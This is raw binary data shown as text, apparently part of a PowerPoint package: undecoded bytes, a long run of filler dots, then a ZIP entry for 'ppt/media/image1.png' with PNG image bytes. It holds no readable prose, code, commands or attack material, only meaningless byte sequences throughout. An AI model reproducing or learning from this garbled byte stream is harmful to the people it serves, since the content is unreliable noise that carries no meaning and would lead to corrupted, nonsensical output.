....z..'....~+..H..>..V.....7.~7.c..|.c.:..,V.-....-xw.$..v..x.>.]k.'.yg.k..W..v........[g.j..J...kbf...3...O....X.N.3.......C0.K/N.J>..V...4.+j.F..Q._...Z..=|Uz......Q.[.G2....1.*....FV.......#....,.....?.....j..........>.x?......~..n..;o.S.....-:.........u...uO......>..{...........|E..3G....~;.^..N..i..#..M......~..o......$.../>.x'..,......_..../^.................o.......B....,....:...|-.=j....5Lv[S.R..,..+...?...Uja.l~.N...Ta....(......u.3...W.S.8.U......lV3...RuV..<>..S.N...F..
X..0...EE~A....:..a.k./W....7F...?.'...u)..-..i....:h_.t...^.....~....W.$Q.D.|u..    ._...<#.+..&....<#g.............?.5..VO...xv../......rk...5{.?J.?.?.nt[.~&|G.oo...
|&<.....x..T.....O...G.Ms..K...\.yFV.....F
....^t...
s.V....|F../...B.....[.4..k....N.J3..{<C....P._..g..j8|V.W..*a.t.u1...#O.......W...%..c...W.....
....s/.._....|Q..t?.s.....xs....o....L.o.>......].....N./i..M.........x*..k..........M.....*|A...?..._..4.^...l."....<!...7......'.>:xs...].....x......-_....-~........+...~"|*....US..../g...2....iC.[..l,...*p.R....f.=..W...U.gK.....ltEFN)T..Z5..T..,u.6*...S/.9.c.G......F....G.O..>6x_..../.S..*.....>x...,.|y......i...x.B..|=...S.....^...:%......u.x53h|;...{........*..k.......0.m.p..a.YM/iF.....aQ.h.)..[J1....h.(....+R.Z
\..5 ...e(.)+..Q..j.(....(...(...(...(...(...(...(...(...(...(....>....*x..{C>0.C......6....jk..Y.<.....].]R.5)4...._...[...A..!..?d..F.W.....?....-..F.....)x....=k.7.|=......x......|M....?.xm,.._S...O.hk....`-......*..pT..T\S...u%.....<L.U.".....u...zR.e)FRR...rM.JXgFXyI.yJ..a...t.
....9|.G....e......G...f......G.....C....o.......z...k......Yxr.....T.u.s[.|#>...........-..y4..~......6..E..'..    \_.|.......l..]j.XK.\.0.    ........./...zL..i..p.5.....+E)*..JJ..U}.mT...|J....h...N!N....^...Z..r....^..E....T!..q.m,5*xy+Y..
/.p.W.c.V.d.....U...~..+..&......>...B.C...^4.e..~(x[I.<......../...+^....zo...E..........._kU....x.....<.S.Y...W.;k}4j^..........#.MKL.._.].|.{.h..&.|H..q...]3L.u.[..M.....=...........J*Q....*..4...*I{6.t.K.J.4..xR....E..qP..q....p....N._...cV..V..Z.j.<........?.|9.g...f..^..W.....<.I._
|..w...|-...&....o.:....=G....e..I/.3...3E..R....F..2sw....[.|0..%.!~..../<o?....W..~.\.0...t..?..|.7..............2.,......wnj.m.RrS..Rx...)|JO0.q......o..2b.......}...#.CEo..)`...I<2...28..4.$H...8..U#.4P....."........S...m...z..o...1..R.b.c.....d.Z$..-....Q@..(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(.../.^../.>.x..........~ .....{.^.......{.Y..U._..........W...........^.o4]....k..P...5f.(.&...M]uWZ..V.$pA...T.4..3o.QU.s....;..9...h........k....T.
qm.F0NN.j)E6..-_W..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................PK..
.......!....
............ppt/media/image1.png.PNG
.
...IHDR...x.................sRGB........    pHYs...........>....BIDATx^.}..$Gu...9.^.Iw'.....(....@6"J.....,0.lL6....&I.-....9_....vos...............T..\ow..........+c2.4.M" ...H.$...
`4.L..+EJ.$.....D@"....+.Vv...D@" ...T..I...W...H.$.....$Z..$.....D@"PA.$.V.\)Z" ...H.$..he...H.$....@...D[Ap.h..D@" ...H..}@" ...H.$..D@.m....%.....D@" .V....D@" ...T..I...W...w.q..h...%4...:.._....'...
   .......|!.....t>..*....*...cd...[....Y..B@...._.....~:*..........z.....8Oi....dr....'.j.6.._w......$..q..n+..].............c:Oi.&...f..I.X.[....'....G@...!.E`..e(`......c.~.|.IqL.)....'d(&.W....+08........+...*b.3YO....yRVH..,].I..D.(.SUR.P.y......T.".Pd.}.[V...l$..7..]w..SOy..1N
Q.=4.3H..%,8..o.~..].g...*..U..x
!.e..&..(...Q...^K....X..J...{q..._..m....t...*..Ai.5.6..n.u,..".).f...W>Uh    uV..z.....s.*.VY...X...X.LQ..TA..!..2.....c##1:~.......n..(..3..;%Pv.}...ga..m..W&S./.......).W....N....Z.....M{..7..~.[..1....Y......-~.9...6........n.    .D.2.R.=.........E%..Q.)...    ]..L.G..v.B.......7.z.....3..7...........3..0.....O!d.
G.Y..d.6.2.Q...........X....@....J...../...~.q.3.@B..LV.'.............~..[.<zz./.t|y.7.....P,......S....]..5w.w....=....K.a.*..>..>s..*.RI...........<.[....G......k.Y{.... ....Z}..R.U..<.....xfM.r...~..~qP..`....h..$....]pg.....|...?...O....On9...+.......~...8.......8......B5.Ec7wm..._.vb{s..;J....}i.L..w,z[.o.D....hY.W....F.+W...w.y'..-ZD........^....)a..,H.Ti.t..1...gM..J......BE..AT.}.\}....7+!U.).]{m...C.p....@...)...nD...:.M......_.....=.....u'.A.g...v...S....0...t.{i....&n.n..O......[...,b..M+..._......X.5.}..].!..{zl...G......L...3g....../mK.,..[n...pz........w..."Yu.....\/b...^.#....YK..g.....*+.j...+........O............n..}#M__.u...c.i.`.>...[..^.N....c./tHx}.'O..}}x...y..NO._V..1..&*......N.....A..1...h..]7..?}..f3.L..(..,]...H$...........m..:|..l.`........Z.f...s].............a.|1....|.j. ...*{ ....o.I...z.....8....@..1|+$..".XJ..s..6...u..3.t.$.b..J.I..:....YK/.J.k..AY+}!*.>R.q+.z..C..w.TWQ..Ox...'l....l...z.@f}..o.....ga...6.X.r..~..m....e.4..r..K.Pd.|.O/F.m...n....S.5.PQc.....[.....5..D...w....G..IZ.......1C....[..g9..d..\.^.>.P...>:....._......"...;.D;o.<.0S..\o...r...UR....y.d..>.e.......@....6..\{..>S..FC0..M644@-[.`....1.G.../_......8.r..{.m...I..v....w......P.f..e.M....u.......
i...Pd......wq.J..uQ.
K9.....A.t..,....v.e,..>...:l6kmmMccSKK.~.n...0.MB..&.7...d8....yp.[..z.h..|..E.NY....... ?...Yo6p......|..]..F..3>q....X....y.7......d...U..T...O.OD..._.......6.M...E...>...}.....v..5477..3w..y...P..............o?..?..F..|.....|..x...;...3..F......1.......;.J?......Ae2..D@"0..(.t..........;..e.9=...=n.l......C..i.T.9..3V..W.% To....,...ut.[.........j.#[..0.....d6..........    $......@.h>...<..v...p...}0..\..mhZ.p......Z..1.naO.m.].....EK....l........
.Z? .....J.B" ......&Z.a.mM.B...N....Sja.mkk.?~KK3).Z...Bo.+c
...04.m.XV..-.L.4..x.q.rg5.L.V..J.$....@.....%u........#..ho..z..9.....@.0.k..f.b...2.b...d..,......I...2....[,+..V.O:\............F.I.y.3'aXa...`,Z.I..vl|.p
.x.......p....4c...........Dc..z...<.L.p..vV..m......;9.....b....j...M......8q..i.8;......u.6...X3...~...[&SJ.$..../......e6.8.E.._...u......_..)..\...0..D.......d..1.........=......Z.9e^2f.k..sv..K.s....?SS...0.x.0.......O..XH.:O..m.....1...p\c...NO{..6......7...B..G....r.....D...N..|..[...y....{.R..A.?...L..    ...V.E..;...........0ZRon6...R.+.V........>.?..5.\..?.i...;vlGlaex&e........Hf...x.....[\..8.5ua.....w........o}}...).F...%P8...........v..7<....O=?......^.._...+..9b....:.}...]w....    ..'.2S...e.........k...\.dd..'j....L.wM.@".<.......:..Wy........./.../.t.8.=4..>b[v..;..0..;.]..Xl{..)..._n..........C    .FG(....B.dY..~............%._..x.....}}h..7_5p..U.. .v..p.|cPm1.*/.....<<2.D@" .(....Xe-.'i...r..A.x.w.E.....X.0VId[c}.....v1YV.&).@..}.+P.....}.+...[_c.X$.=.p%..9..;......./..m.......!.....l..[..?{..5.....}b,.8<.......g<k.....o...i....m....w..|.....ODo.^.s..zS.../...b....._...l~i....u#.s`...........Z]&...`0...x\.l.-..."....................#.Pf......{.....}\y...|Y.j....a=..!....(...H...e`.).    Ui...P.P.."...L...0C+...q...t:.N..J....?F_|.,.......ccc u. ....@.:.........=_.......Ws-tYC.........I.].....a.4...z............:...P..k.e.{...._...... .P(.X.\..\>
.......-?z$...Ad........<..H6...../<.....F....-...........AwM-..<..............S.i....H..).JmR...c...U.U.......U.d[..f....P..4.....Mr....}.d45...01'.Jt....I..c`.c.7...`t...N.....36......%K...;e.v..gN.:.S.......|.|./...?4..!Z$.5...........4..:..#..y..&07.f!
+.m9.<|..2..zg.4.0X.........v..~..."9........f$oh..h.Z.....?....#/...5.Qm.a.iTh...,.e...C..@.N....-....C...+.r....2%.....`#b2..NB..4..2.4..J.U
..B...Sy&.^P..<...f.F..J... Z......{.G.......5...,.....\..4O.../Z...nvt......j.0;.A..-[........4s.L.......?...H.c....m.....q..tl..s]]=x...z.7.@..%K.W..Z..o.6.........,.../...%.8`.    ....:Wr.....9.\.<...................8........D..G.>......aF..V...t.7..9.8.s.j...eN`.+......b........b.V*..=(...T...FC.(.....k.)...K....mY....y....xr`,../<..l..os2.M...el.L.!........Ykkki.-6X..[ H.y...+......Ov.9.? ..z...o....#.c=..e>.....i4..<.(j..,R{....b.>....^...M.C8..?..9i.w./..c........[..!..3..G.@`.....(.+............#.P...m..o.1.fB8.n.f.....w...o.V........<...I...L!..Vr..H.$.U@@P...T*o...\.....U..TC;..jE.D........Xh.*..s../8..;.).{w.e......Q..<B...v.U.......[.....Vp-)......?Nc...N....`p`8.......2.X..!3Y..N....l.X.=...ux.f,....v...!..a..VS[..:I...u+;....k.&'....".3t..k.....;.h>{.5....M....[.........y[...G>;.._X{.u.W........VA.4...L)....x...`4V...JwT-....5Za.U....D.L...c....'g.RU......vN.....R;..a.........-..:...F...lv.y..Q.:.9.N......s..H?....n.=::.&...A......`.vMM-.du..S.^k.....R;0....~..{......ee..`z0i..bB...B....f.R.....N...1&.:.4#a..bcc......F....o=....\|..+.5.....kh....%.V.\..[.M.e...~#.J.$...bV..JVS*...R..De&.Edj.yt...T'.T.j..z..@qD..5..2...u...u../f.H...Y..@.C..hG..(......5.>.O..g^{*"W.......A.~...,...L1MS.9O..H.....4..@z.C....Y....C.:....8!...k.X.=...}....K....P.1@..en.....W.=v.G...._..v~...J[...E.5.......].r... ....Pj...U...y%...Y.....m.E.."....5.&
....?.[h.K.#H.7.....m.@...s{G.4.....9...D....|.....Z..A2%2...1.Y...D..y..AAXD.V..)a=...'v.e.^...t.|a.}m.=.....u.j...F>....4..j.H........../.._[..G.4.&..p.~......|....W,.s..N.@4.%.I.$.....Pj....(..#...f.:...I{.h.....!.r.M..A..y....{..........~....3>.w.-.\........H..t...l<8.'-)..-..7@.............m...bh9.X)s8.v ...E._.m].HO?'~.U[j_..bP..I%......Ao....9*j6T....-...t..c...4..jh.X..,.?gr...[T...%....@u.(.h..s...p.b.......|.YS..I.K.u...o...g.1..>.LMl.$`b.683.<.....A
..=......ih...u..H....aj\:z...r.@..Qd2..CoD.L\.i."'..d=..r.r..=oebYk..(.......K.....%z......[a7.2G.-M........VX,..B.....c..a%.a:..'l.Z..55.\..V...R$.....D ....-^........~.R...=..'..IX:.................o:v..'.....-...i...a?..w...A..t ."U}a2..V.]......F]....*.+..k..    ..&6..
.1)..6..m..f8....B.tH.E.80:>.._...F.E..M. 9`....{N........./l..:......W7"\%6(..=.Pt.....;_y.......5..t._-T.`.h..%.....D`r.(.h.6.d.}<....B1......f.....IH.kH..l>.&z..b......21f.....U...|5..S.cl....'...<.D.'k.E.....8..=..h.....T...\..:F..c.h.i.:[M.{m.....P....Z    o...|.:..4..t...C#..g.;.7..`...Xi....|.....G..o..n......U.k..oA..e.W...15.J.......q.......B...-Y.D@"0..P.Ailo.3S5.4E..A..1.........{)./l....^.....^.7?o1"...#8.....iko_.nh.c.LiC.$.,...x.....X0....?..,..\..m......N...Y....Z.b.............J.7.$..OEv......{..........<."..(..s...........Np.<..........?... X..7.....]...1.
.....V...[}Cp...Es..u...#.....)..d5$...Y.@..L..PM..@.G.`JX.A....7.g....%...}.?<uR.y_. .B    .*..iiA.D8.,li...[.6.a.jE....[.o.R.k..===.!.G.....z.hJ..v...Z........:...C......<.'|..c.f1...e.,k..6 .S.U.\.XT.Q....?...........].w.....wz..|...~.5.X..e1...FF-.,....E...1...]_..&......W.Q" ....(.J...q.....E...J....J)...:..G.P..c.v...N......k..G..~.h..9..Z}..a..q
.@~.Ml...6......c..g.]s...".....~.u
@.U.E...K. d..q...z.N.-..M........5.......~.o.....d.8..M..[......u1.G12J..._R3..`..Uk..w......6.m9.x.....#.'..e....>M...t..j/.m.....T7....... .c.:c.m.....d`.b...%......4U.    b;.w.#E...K$...r.KBNf.U..gfH.........Sh.L[...u..t..@..........2.yr4..\+6eSC........:.K.Ql...|0x.Et.\...r..F...%.....V..
../..m.....o......g.uG.W..    .0 ...:7.."ZdJ..$N~...}/n7.e!...`L.M..cy..%k..9}...k...].zb...n.7.......(.u@X.L.....SsxF.R......@...%+.XE.yt........b..3...u..m.....7....L.(....`...g"F.5([.%...J5Fg...(.h.........'.\u.K.....n....~....?.5d.D...8...g.E.7hu.}1....;.^t5..)....?....:rH.#...c...."0...CM..P......,\.....Lq. .n..G.W...;V...........P......#.9..w...).y......5.....B._...D..u...].b.".\dC.|..?../..x..8.B'..RQC.........
oK}.<...}...........9JL|..N,^-.......~...]wA...=........}.3..p...l.U.........d.....lF..(..U~.V.)X<kx...xe,.f."..bP+.....<....Xl..j..1t.m<@c.f.....W.c_......0)....
k.<.J.....z..?.....y..3.:.~R.4..A..'N..}.>......$.......u."....1|....Q.......[.X..B@T0P.{3.A...b.z.......-N;[0.....5-....L>w...C....+...9.....iX...i.....l
...=}.~...7DFu.n8...;WR^..Y.....z.......B.m.........|..1i.......8.._..~X.$...../[...?.....3..$"-^W....?6A..C" ...dC.K.{sV`.:7)O*.......]..R....`:..h.'.P.kO.<y....G......N7V]E.$...5.;.1.YW..2...X`.{ .....'.......<"."v...O_.v-|....YJ....................kN.9.4......$.....`.Qr.}...
u..........[<.....Q...\hr.2yN.E].<.$.A}...2...Pr.......].}Gch........d.Mb.w...].........0.>....';...st........~..E..m..f6'..FU..>.g....W.{.@.
.......7.......]........[.D+_)....D@"PQ.J$Z...!....&8~..@_.....}>..G..T...Kz.1..neGl..pk.iQ............U.....c4..F.R........Q..6..K. ...8$.QIld.......G..CK.....<10...H..]... ..W..AY...J..T..'#.{1...........y!...`.BX.#...0&.....~....?w&..C8._h..|,......    V..7i.1. %}. .......Q6W...v2........."#..K.u..#.h...%......T0...y........4..M.....AS...k...":..9.M8hkb.....4...A),".bL....A .Dcc....j.qK.)K..... .:!#....|.:."..l.........!..4...b,9.4. ]._.4...../..<.z..==....x...3.Z.)...z.........4.......2. ......O....Z.3.....Z8.Ar.Xk....E;@.h .....DH..=....P0..6C.j..j..........\........D@"P&.e.-. [;6........../.....)*G|.?..|....!cG..0
.a.*..
.";..RG.CH._....Z.@l '...g..!....H..P+(.Du.6.`.....<f..x..m../.~.).v6.+X...d.'.....G.....aOnq.<..s.../    ..).i.........0..%......Z{..S....,!)u.2.
.]" .....@.D+.N.hi....v..IW..
B$n...:.A..|.A..x.......q...B2..!oQ.3..z.......`...../.a.x..[.U..mM.....$.....{_.>....c....@..w.\...a.GJ..(Z.y&.D.X#H.=.ja.t.1R.D@" ......>D..[A...Z9N..'.%K/.....LS@.T../...4.......hP..cT......1.+8#Q...|...>X...?....5...d..w....7]..@ ..W.U..O}......cq.0.gDKp.....EE..Y[.SV3...
w.g.....d^....L..&....
;.......ID@O.U6C.x.I.c.P..S.C..f.V4....G.<..zxS..?....../K.Wl&...D.e..b........[.s..........]..X...]2..V...+...c.o......}.kdf4...hmp.......-6...,KH.s...[ml4m.lS6v..QK.K..-...........~.A."l<....MA...}..B..;.C...)..1....7.i?.A.7_~.r.=X8|.H.*.(.w...=.........K*T.....h/.P..W..._...IH.s......VwZ..^.P.....s.....`.I.k.cc`...c....
.jZ...].l.-,.4p.v:-p.j..`A.i...YU...y.y.mXL........-.y...>..^....0,!.
...|.R+U@....3.P.JM43c.3.....1W$....^.H)......ng_.h....r....d.o.%...5.>i.'....b...a..."..I...%....6,J...)N.E#....W...]BZ....}f?..Q.F......i21Q....ZK. ...sI.....s.......x...y..c!.nB$.C..?x..X...._0,O..|j}['V...."c.....+.r.&)\x.V.......r+..x$......!!-....L.}f?.yV.(..Z.hIST....8...C.m............/z..}p[....}q.1Z. .....7}3........._..q....%..}......hQA0.L.Z......gQV.......Z..o.x,..)q._...E.J....g..R6............pk.V..]......,Q.@....]...PZ....MO..y..=...n....l.{......iud....ZC..4.K...>.9....}}..w....&...(.a...O9s{..x...3T....x.K......W.{...?u.F.......[U-...^4.    .[........R!V.|U.K....SDN..P.^.....3.{.g....w&..S[D.\g2.h...*....*..3.%.z%..I.E@.i...........#]l...fQj...~....n...2..s-.5,...Y`e..O...2...OL.f..C..Wm 0../    .z..j.%0.h.+.....vU3.o..T..&HK.y    Yr.m..i..e....*..Tu.....I.yZ]Z.I.Q.m....Z...+.....{....q.....=.V.......[<......O..,.#....b....6.E<.BL.....i.."_.0.F.v....y.!...LY.<....Rre.R...`.. *I..uP5D$P..E..7.@A.. U5.*O.S.+K.......3Wc.X%V.JY....J..".......!..`....A.].0.~;....D[.-.(........[wW....D..B..PTg..@..).3.U.^.
.\\.2..@D....f9.fn.O..7..-.U....H..$.`Fe.(..+.i)TUVf.H...ZC...7~...q.-.RUA.jE.SU@.......:.D>..PV2...R
.........@.....<?....P..S
.../b(.\.......[.z.........<............bY,Z.........\\.2u.....gGr.U..h.....O-....2......2...I.....^Y(.em..G.\    2.S.Z.....).........P.....T........ad.M.M..%.+/eEU>...I.E.qp-l..f.......W.Y.v.....z..u../_..o.W\%.E.EP.\..h.sg..+..(.7.w..8..Z.yH..i..J...T.$...."...S...)O.....P...Wd._h.j.j{...4...>..o...oB..qw..R..:>.R..E@.m)..#..nA.........b.;.|.D.E..X...e.J......|......8..Z.yH...........&..e.Y.j.d.f.Y. P...L..    ..2..U.\..9Ou.z.
.GQ...JI.Ly[..8...`..GvV.X.m.........P.b.2>..eK/C....^.9.....:...O..d.....2o..s....XU..J...,.Q.. 3G...*O..d"..7...
.d.
.,4W5r.V.|V....x...\}2OWI..TA......<..4...T.$...;;..U0...H]]...'{..-....J9...J.JD.pF{....*.m...Z..OD.c.)...(.7..{#D.2...U.U./..X.7.X..`WQ",... .l6<..>..T.<...:..a.!@^.#.l.h..mR}}..H_E....d".....q.-?..{&.......+Y*.+.j)|J! .vJ..Y........S..c...{.p6.R4.t..w.'....../.h.....oA...iE!...._P&..m..>...D;.n..La..c#K....}.....D2aD.7c..v..5.f....\.)..&MD..E...G.....>./..iE.......w.L.+...>...D;.n..La.B..'...=.7_.x...a/...)`.`...{.~...e.[..S7KH..-2a.B...)..$.)r#d5."..E....~..o..I......Z.\7]..[...juIHK...,J.K. sMG.$.N..&.,...H.$....9.g..*YQ..D@" ....H...wM.Y" ...H....h.......H.$......$..x.d.%.....D`. .v..*YQ..D@" ....H...wM.Y" ...H....h.......H.$......$..x.d.%.....D`. .v..*YQ..D@" ....H...wM.Y" ...H....h.......H.$......$..x.d.%.....D`. .v..*YQ..D@" ....H...wM.Y" ...H....h.......H.$......$..x.d.%.....D`. .v..*YQ..D@" ....H...wM.Y" ...H....h......;.Fc__.....M..U.......5E....o..S.2...:..'?!<...:......$+.......N..F.f......(*..l..,.,O.....#..vo9.d....$..y_......pj...tA.....R.i.-\...;..F.....P..}.CT...z..8...i.
YUB.....By\e|...q..'.\.,.
.H....:..a..Hy...I...'.PqLWW.\.CyRD^....|...^{..m..|;v..]w..L...w%x.......uV.W.!..F.U(H.1...kBnS.....QFFFP...|....~;~qL..1............<.6e2b.l....z{{.%..s.=t    ..KtR......S.8WMTU.....S.2...t..*(D...(2.1x.....{.,.e.*..8.W......3.n.o...";..4..{.U&...Vu.U.DM.|.I.q..-...^.)Su.2.4.6a.....lRt.....'......"}oo....:....c$.W....~.Q../...GH...O.}L.*;.'..#.
j......u.,.9....5.....]##1.r.]P.Y3.O..R......{..,xkfX.....k..k.....:.Gx7.;..|.....x.....A..Wvf2!...^|......W.    ...T..5..H%.?..J......$<..XDK...D...J.-"...'WO._z....B.L...k.W./..D...j.J    H    .:..(.$......"O?... .x..1"...1..3....*....z..".,.eA-.\8.Y+-D.f.5$    T.1.XM|..4.)(P..U.y...v.(Q.<..U"Z...UVO.....r.fL.I...V*.T.v......E....H0...M...+.Y..q...L)^....'..."..$...,]d.:+5N.$*NK.r...@...y!.+...../=.U... ./.q..s.3..B.-...v.U..j>}.....u..*.......\.Hp.).\>...sPF.1RI..).Kh.Bo.e.("W"]*B.eJ.LC...').$.8O..r....h.|p....z**.G..J.w    }..*...`V./.Zr...y^..t..D..&.V...n!4.A    *eT.1.....<..R. 9..!S..._R){..W2...Z.W......&...gJf%.%d

.l{&2..K.UyE....7A...tj.`..R......9.......k...E.*.._6B]VB.+c.~....$.."....f.....D6R....k.*..J.$E3.VZ.....J.....9...4I_    .,-D.I..%S..
....ZQm..)......5..H..N...AJu.4..x..#. +.h$Z-<$....V.(..D    }.    Y.M.%..4o.Z_T.T...WY[b.\..\...|iWU.....P.v..W...I..a,..r=.....%-....)......*...J.0IP.%.-).J...EUU3.h!...(........*.0...........[F]..q.7..=y....f4.d..E...8q|.Yg....*z.....1. .m.Q............&0.'0~..<.Em56A$+X7$8....{.......t-T.<O...W%JKe.......s...jc~...a...{..:.s..r...7.|D.+...w{.zh.....;.nd..L(..w.W.......{.FN.b...*...n...<..k.......iu8.....t..Y.........|.Y.J....~...}...~...*7B@..t.    ..r..nG.{......>[..n.......\.,.$...[.....=...:Y...&*..K...."0.UUC-B.z.).....ji.[...$.......oPz.f&Qb._z....G.y.....?.U...-.......h.5M|..}.....x...{..Q.....%j..H.b.#Z...t....x....={..2o....w......"..........xh....S.q..EQc.....L.1......(.....
....8..S^..2E2-E..L_'4.....%./...rK!P.6,.N..*.Ta.T..ezc..>t.....`..K.    ..u.0(...U.U.r......Q.t....
.PMO......x#..o.Z.y..h..pw..t~.._U.....E............7...........~..4J>D..Hi...G......U.f..L....q..>J    ..D.uFvQ.......:..j........,./.P..g.6...r....6    /.
.).h+.j%E..]9.K.....*...xm.....HQ.L......h..m..(q...h..K.e...@ (a)..$.d..*..Lf....".A.T...B...^.......Q.-..VV8?....*o.?..: &..r.1*@@.._r..]:....y..RI3.:KN.*...c4.>.8..A.[......H..G..B..&J    4.U.....d$.?..\.])..=SF1.....(...t...4p..)Th.X.m..)OJ......Z.Ab.U.....    *.w.....Q...N...%...4(J..bV.p.*Y..Xe...mV..<9m...s}}=\i.nP...9*J.T.:.b...{.......{.J....@..o}.6.d)..J.Sf......!7..tE...`Y.~?......N.fd...l.>.,y    A..Z.%.|O.Lh....6....Uw.......'..$...We.%...R..D[
j...D.+.R.D@" ...H.f+.r.v..y.n..D@" ..
..h...,D" ...H.f+..hg......H.$.... ..*0.B$.....D`." .v..y.n..D@" ..
..h...,D" ...H.f+..hg......H.$.... ..*0.B$.....D`." .v..y.n..D@" ..
..h...,D" ...H.f+..hg......H.$.... ..*0.B$.....D`." .v..y.n..D@" ..
..h...,D" ...H.f+..hg......H.$.... ..*0.B$.....D`." .v..y.n..D@" ..
..h...,D" ...H.f+..hg......H.$.... ..*0.B$.....D`." .v..y.n..D@" ..
..h...,D" ...H.f+..hg......H.$.... ..*0.B$.....D`." .v..y.n..D@" ..
..h...,D" ...H.f+..hg......H.$.... ..*0.B$.....D`." .v..y.n..D@" ..
..h...,D" ...H.f+..d2.j.?.v.lEC.{.".....X3.{5.%.U..{....-(..v.F.lue.f'..M6...W#P2Y.....jPO....x...Y1..D@" ..    .H..    wQ.A" ...H..,..h.......H.$.........    w.Bmx...y$_w.r...%F)r..B.x...\.,J...3..ioZ.D.......}m..o.......6...TT..>......uE.B........1.5,..\..]`.....o....$+.T.1.Z2............0C.Wy.}..U5w.."....o..........-......;F.~a...1...(.Z..u..$..{E...~..s.Z][....\.3...._....?..Y.we.%.5d.E.<s..Z>....j:...=w....,..?..w.w....*.D%...N.I.l...t)./,.f.y...,....a_..x.P../..yJS...o..W..f..........]?...>...^r..........j.8..E.Ypm    .QQEL.....:"..z..>..8B?.........l....|..WE.y..;....,x.!o.o.#'....
@.F%Q1T............T......[..(.h.J...;.+e.*...*.}.v.].-.6.9.........~.E.;4>o...<.....g......-.S_ESv..]Kv..o.$f.t..M#...Z&>.7.c.....L-.P...F...%H>....2.P.*..:.kY.._..%...\L.m.D...v..?...u.-....+.......pI.h....K..~..n.K.......3-W. ...yP)........p..s..Hx..:e....P>..Y..
.$..    .(...
....b......,%.S..Y.*.wf......J. ....B..    ....r.7.....8...&....yD........
G..v.i..J.r.d...|.U........g6.$...i.....(..W.....v....,g.......Wu..p,^..+VN..B^MDK/.bY.p.14%.<._(w.k>.n..c:#..\.....u...\p.(R.........6......U.sE;}y.$B7;SB.......O.@^*...;G.K...Rl.B    .|..j.T8...r.a..5...Y..R..o,|P.w.R.8...&...z.U_..f.'.N"..
v.i...B.,.....f6.......3.v?Q..j......l..)qTE....K............u..`bMD..7...V.b."K..<T..)..H...\....:.D...d.hB...Vh.....D..*.0.E.._...Pj2=9Sy...V..4.......T.1....8......Y..#.@.?k'....Kg........{.b..g.|.Q)xF`........X........S...\...c.k.....a.'.D...F..<w......\ZT.URX.Q......}.H..e.wEUP.R.z).S.b.P.m._....{..3......)..:...W...........\...Y7q.K.<.k..kio.L...i.{U-.W(.....3..B.8s}...{........../.{.c..Z1..O.(MDK../.r.xK.pE.I-...~i.^(
./.x......$..X5..LL:..V.........I.x.......i4...af.E.-.N../.\b.bs.I/XV)Y..3U..[....mn.;._...5..D.....ci]KG.g....{U7....r..gj.~Dr.I..@......4..#i....N.4MD.k.Y...E&\.......S._|...~q..ne.i..6Z..r.....(.pQ4.sf&..2T    =.3#..~.H...R.kc.......$.....Ty3...h)tR...)T..QN..j....,.J.n[..8...u..#..=.z.!e.K.Z..Z....U...
1T..+z..h..35v?r1QM..........b..5.B4.-..Qw.k...w........x.E......#./.\......4d.....m..d..E...v...ba......T.'    ......p@..r.^.*..>...P~yP.-.N.....3.....j........z..*.p.n..>.v...\pL...5.wG......^U50k../1...gj.~.U... .x..(.....h...k+.i.X%....""C.^3...?4.
i.....{YR`    ...j.r.Q..#C..j.ef P..Y.d.{gFw*...I......@..3.........I........+.@a....Ib...2hYA$... D2..E@..){k.V..D[....$.....*.7./...N.{.W..:C.U..#...H.$...Y.@..vV._6V" ...H.$..E@j...W
..H.$......$....d.%.....D...H..(.R.D@" ....v.$.... ./...H.$..E@:CU.^)\" ............{.0[.[lF.Q..RJ%..D[It.l..D@"...Ou......xB%L....V\.$..C,...H.$.. ...;.|..$@.mq...n..Zc....r..Z^I.U.Z.$...H..F../oy.o..yl...Z..l.G..EK.....V.}a..&....\.b..\.["0.........tnAm...z..A..<B..&....#4..d..q..K+t$......b.D.CY.p..L&S...A..q.hH..q..1..J.3.LG.=.FS....q..9i.. *.%0yI.)...3...'4.I$/+.z...`...4..6.m..s........-.C......khXX_.)|....HN...D+Yv.o.,..^\.....m<...2n... K..1#...d.hNQ.1i.    8.r.e.{..?8Y...5#8.o    .*......G..e..~.1....1z.'...or2......,..}@6.....{...Z....-Y..D;-...J...IVRg.b1C<nL....!.O&.l...N(.`..S8.z.TX.....-./v......    .    .8....t..]..D...F.O&.lO..    .....;x?W.,|...R.4A.X.=pIc...l...4SZ-5.i....j....?r<.F.~..+.    p.M.H.A.q..';N.d....).j1H....&.....*tY.!..Tn9F.v
..e.a*........    c$...L@....B-._9.#]..|.M...e..Q...S...-..?=..-n....\..F.7...W......._..'...?^._.qEn......:o?.u......6..q..~.._..+5.m1H...Wi\.JD.i8m=fo~>F..h...8........(0.[C.$.....S.{I,..qC4....^\..... ..LP..<    .../.|    z...9%.%.]....vI.-....E.m...Y.{o4.-%...3m%\Re!9J...b....h]w......
Fc...#V..2./#TXi.J....b43.e...m.F#Sjy......M..Z.4
F..#2..@m.'LD....r.M...6.$Yo.|...z.kA.......SE.K........9m....3X..]^.3^...U>Q..hU..p..K..x.i.z.m..Nd.hcQ.'.-.QK.P.N...s.    .k.bN._0.)i71[3.3.......1X....w._..kq&..`.1...c|0.D..r.l..3....S.%i4..7.F.P.M..YSX.....S... .........Fi...%R.IV0...R{...Z.e........s.../.6..V...)"d.;Ce.....W..n.I.@y......g.\.g....l..V.f..f.sC.d..[...j.....6..jr......v...c......c......Nv.K&'.Y...._3.0Q..c...e.....*....^..n.:.../].F.F......L9DW...4........U....4.0k...%W...;.......).G..H4.    G..`...z..........!...\B.$CbdAFd.l >E.x..W..g8....1.y.`..R    .A..2..VM.'.K.e..Y..j2..    ..rE.7F.#l5XmF.fh.v..i..,f.%d.......r..n.......]....u.b.[.m..X#ns.....q.j..
...5.p.#.v{...p[.nG...8.a.#l..<....s.....n...6s....LI..)F=.......;.k.E.,.....H."..J54.........jO.I.Z.+..,...Z..%....{"...%.....a.[..7.Nq..o.........^6....>.z..V-...U.o]6..esq......k.x.9...1/.@..B,.....d.K...D.W.p......wV4.pi.W..WZ.@.P..........`.E.
